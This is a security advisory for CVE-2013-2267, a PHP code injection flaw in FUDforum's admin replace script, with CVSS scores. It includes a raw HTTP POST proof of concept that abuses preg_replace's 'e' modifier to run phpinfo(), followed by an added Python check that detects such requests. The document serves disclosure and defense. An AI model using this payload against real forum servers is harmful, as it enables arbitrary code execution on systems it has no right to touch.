High-Tech Bridge (htbridge) HTB23146
Feb 21, 2013 - 12:00 a.m.

PHP Code Injection in FUDforum

2013-02-21 00:00:00
High-Tech Bridge
www.htbridge.com

CVSS3: 7.2 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: HIGH
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS2: 9 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: SINGLE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE
  Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

EPSS: 0.052 Low
  Percentile: 92.2%

High-Tech Bridge Security Research Lab discovered a vulnerability in FUDforum that can be exploited to execute arbitrary PHP code on the target system.

  1. PHP Code Injection in FUDforum: CVE-2013-2267
    The vulnerability exists due to insufficient validation of the HTTP POST parameters “regex_str”, “regex_str_opt” and “regex_with” in the “/adm/admreplace.php” script before they are used in the “preg_replace()” function. A remote administrator can send a specially crafted HTTP POST request to inject and execute arbitrary PHP code on the target system with the privileges of the web server.
    The following PoC (Proof of Concept) code executes the “phpinfo()” function:
    POST /adm/admreplace.php HTTP/1.1
    Host: fudforum
    Referer: http://fudforum/adm/admreplace.php?&SQ=8928823a5edf50cc642792c2fa4d8863
    Cookie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 111

    SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add&btn_regex=1&edit=&regex_str=(.*)&regex_str_opt=e&regex_with=phpinfo()
    Successful exploitation of the vulnerability requires administrative privileges within the application.
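A detection check for the request pattern described above, as an added example that is not part of the High-Tech Bridge advisory or the FUDforum code base. It assumes raw HTTP requests, including bodies, are available as text (for instance from a reverse proxy or WAF log); the function names and sample requests are constructed for illustration.

```python
from urllib.parse import parse_qs

TARGET_PATH = "/adm/admreplace.php"          # script named in the advisory
PARAMS = ("regex_str", "regex_str_opt", "regex_with")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, decoded form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split(" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    path = parts[1].split("?", 1)[0]
    # parse_qs percent-decodes values, so the check below sees decoded text.
    return parts[0].upper(), path, parse_qs(body.strip(), keep_blank_values=True)


def find_eval_rule(raw):
    """Return the three regex fields if the request submits the 'e' modifier."""
    try:
        method, path, form = parse_request(raw)
    except ValueError:
        return None
    if method != "POST" or not path.endswith(TARGET_PATH):
        return None
    # PCRE modifiers are case-sensitive; only lowercase 'e' evaluates the replacement.
    if not any("e" in opt for opt in form.get("regex_str_opt", [])):
        return None
    return {name: form.get(name, [""])[0] for name in PARAMS}


# Constructed sample requests (the SQ token is a placeholder).
HEADERS = (
    "POST /adm/admreplace.php HTTP/1.1\r\n"
    "Host: fudforum\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
)
FLAGGED = HEADERS + "SQ=PLACEHOLDER&btn_regex=1&regex_str=(.*)&regex_str_opt=e&regex_with=phpinfo()"
BENIGN = HEADERS + "SQ=PLACEHOLDER&btn_regex=1&regex_str=colou?r&regex_str_opt=i&regex_with=color"

if __name__ == "__main__":
    for name, req in (("flagged", FLAGGED), ("benign", BENIGN)):
        print(name, find_eval_rule(req))
```

A hit returns the submitted pattern, options and replacement so an analyst can review what the administrator account tried to store.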
CPE
Name      Operator  Version
fudforum  le        3.0.4
